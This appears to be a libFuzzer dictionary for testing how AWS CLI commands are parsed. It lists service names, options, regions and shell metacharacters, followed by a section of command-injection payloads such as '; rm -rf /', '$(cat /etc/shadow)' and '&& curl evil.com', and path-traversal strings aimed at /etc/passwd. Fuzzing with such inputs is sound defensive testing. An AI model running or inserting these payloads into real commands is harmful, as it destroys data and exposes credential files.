# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# AWS CLI Dictionary for libFuzzer
# Contains AWS service names, CLI options, and shell special characters

# AWS CLI Base Command
"aws"

# AWS Service Names - Compute
"ec2"
"lambda"
"ecs"
"eks"
"lightsail"
"batch"
"elasticbeanstalk"
"serverlessrepo"
"outposts"
"imagebuilder"

# AWS Service Names - Storage
"s3"
"s3api"
"s3control"
"efs"
"fsx"
"glacier"
"storagegateway"
"backup"

# AWS Service Names - Database
"rds"
"dynamodb"
"elasticache"
"redshift"
"neptune"
"docdb"
"dax"
"timestream-write"
"timestream-query"
"memorydb"

# AWS Service Names - Networking
"vpc"
"route53"
"cloudfront"
"apigateway"
"apigatewayv2"
"elb"
"elbv2"
"directconnect"
"globalaccelerator"
"appmesh"

# AWS Service Names - Security & Identity
"iam"
"sts"
"cognito-idp"
"cognito-identity"
"secretsmanager"
"kms"
"acm"
"waf"
"wafv2"
"guardduty"
"inspector"
"macie"
"securityhub"

# AWS Service Names - Management & Governance
"cloudformation"
"cloudwatch"
"logs"
"events"
"config"
"cloudtrail"
"organizations"
"ssm"
"servicecatalog"
"resourcegroupstaggingapi"

# AWS Service Names - Application Integration
"sqs"
"sns"
"stepfunctions"
"eventbridge"
"mq"
"swf"
"appsync"

# AWS Service Names - Analytics
"kinesis"
"firehose"
"athena"
"emr"
"glue"
"quicksight"
"databrew"
"lakeformation"

# AWS Service Names - Machine Learning
"sagemaker"
"bedrock"
"comprehend"
"rekognition"
"textract"
"translate"
"polly"
"lex-models"
"personalize"
"forecast"

# AWS Service Names - Developer Tools
"codecommit"
"codebuild"
"codedeploy"
"codepipeline"
"codeartifact"
"codestar"
"cloud9"
"xray"

# Common AWS CLI Operations
"list"
"describe"
"get"
"create"
"delete"
"update"
"put"
"start"
"stop"
"invoke"
"run"
"execute"
"send"
"receive"
"publish"
"subscribe"
"copy"
"move"
"sync"
"upload"
"download"

# Common AWS CLI Options - Global
"--region"
"--profile"
"--output"
"--query"
"--debug"
"--no-verify-ssl"
"--no-sign-request"
"--endpoint-url"
"--cli-read-timeout"
"--cli-connect-timeout"
"--cli-binary-format"
"--no-cli-pager"
"--cli-auto-prompt"
"--no-cli-auto-prompt"
"--color"
"--no-color"
"--version"
"--help"

# Output Formats
"json"
"text"
"table"
"yaml"
"yaml-stream"

# AWS Regions
"us-east-1"
"us-east-2"
"us-west-1"
"us-west-2"
"eu-west-1"
"eu-west-2"
"eu-west-3"
"eu-central-1"
"eu-north-1"
"ap-northeast-1"
"ap-northeast-2"
"ap-northeast-3"
"ap-southeast-1"
"ap-southeast-2"
"ap-south-1"
"sa-east-1"
"ca-central-1"
"me-south-1"
"af-south-1"

# Common Parameter Names
"--bucket"
"--key"
"--table-name"
"--function-name"
"--instance-id"
"--instance-ids"
"--cluster-name"
"--service-name"
"--task-definition"
"--queue-url"
"--topic-arn"
"--role-arn"
"--policy-arn"
"--user-name"
"--group-name"
"--stack-name"
"--log-group-name"
"--parameter-name"
"--secret-id"
"--key-id"
"--filters"
"--max-items"
"--page-size"
"--starting-token"
"--payload"
"--message"
"--message-body"
"--attributes"
"--tags"

# Shell Metacharacters - Command Injection
";"
"|"
"&"
"&&"
"||"
"$"
"`"
"$("
")"
"("
"{"
"}"
"["
"]"
"<"
">"
">>"
"<<"
"!"
"\\"
"\n"
"\r"
"\t"
"\x00"
"*"
"?"
"~"
"#"
"%"
"^"

# Shell Escape Sequences
"\\n"
"\\r"
"\\t"
"\\0"
"\\\\"
"\\'"
"\\\""
"\\x"
"\\u"

# Quote Characters
"'"
"\""
"\`"

# Prohibited Operators (from lexer)
"="
"*="
"/="
"%="
"+="
"-="
"<<="
">>="
"&="
"^="
"|="

# URL/ARN Components
"arn:"
"aws:"
"aws-cn:"
"aws-us-gov:"
"s3://"
"https://"
"http://"
".amazonaws.com"
".aws.amazon.com"

# JSON Syntax (for payloads)
"{"
"}"
"["
"]"
":"
","
"true"
"false"
"null"

# Common Injection Payloads
"; rm -rf /"
"| cat /etc/passwd"
"$(whoami)"
"`id`"
"; echo pwned"
"&& curl evil.com"
"|| wget malicious.com"
"$PATH"
"${HOME}"
"$(cat /etc/shadow)"

# Whitespace Variations
" "
"\t"
"\n"
"\r\n"
"  "
"\t\t"

# Empty and Special Values
""
"null"
"undefined"
"None"
"NaN"
"Infinity"
"-Infinity"

# Numeric Edge Cases
"0"
"-1"
"1"
"999999999"
"-999999999"
"1.0"
"0.0"
"-0"
"1e308"
"-1e308"
"1e-308"

# Path Traversal
"../"
"../../"
"../../../"
"..\\"
"..\\..\\..\\etc\\passwd"
"/etc/passwd"
"/tmp/"
"~/"
"$HOME"

# Unicode and Encoding
"%00"
"%0a"
"%0d"
"%20"
"%27"
"%22"
"\\u0000"
"\\u000a"
"\\u000d"
